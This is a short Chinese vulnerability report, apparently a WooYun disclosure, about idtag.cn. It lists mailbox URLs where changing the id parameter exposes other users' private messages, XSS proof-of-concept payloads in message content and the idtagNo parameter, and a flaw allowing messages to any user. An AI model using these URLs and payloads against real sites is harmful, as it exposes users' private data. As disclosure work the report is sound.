WooYun.org

1.任意站内信查看漏洞
模拟思路：在用户登录后进行站内信查看，修改ID值就可以看到其他站内信了。
问题链接：http://www.idtag.cn/mailbox.do?method=view&id=1&mbType=0&type=2
http://www.idtag.cn/mailbox.do?method=view&id=2&mbType=0&type=2
http://www.idtag.cn/mailbox.do?method=view&id=3&mbType=0&type=2
http://www.idtag.cn/mailbox.do?method=view&id=4&mbType=0&type=2
http://www.idtag.cn/mailbox.do?method=view&id=5&mbType=0&type=2
问题参数：id=
2.站内信跨站问题
1.

<p class="duanluo">站内信内容如下：</p>
                    <p class="duanluo" style="word-break:break-all"><span>
//内容 </span></p><script>Alert(/xss/)</script> 
</span></p>

2.http://www.idtag.cn/jumpSerach.do?method=sendMailBox&idtagNo=<script>alert(/xss/)</script>
问题参数：id=idtagNo=
对输入字符未做相应过滤。
3.设计缺陷问题
http://www.idtag.cn/jumpSerach.do?method=sendMailBox&idtagNo=90449
定义idtagNo参数可以向任意用户发送留言或对未选择获得授权选项的用户和选择允许获得授权选项的用户发送申请。
然后通过查看任意站内信漏洞自己获取授权查看资料 //拿你们领导的测试下！

你说你这个东西出来随随便便一试就有那么多问题，如何让我们放心把身份实名制？
深入的去检测还可能发现更多问题，还有个地方可以看任何人的照片这个就不说了。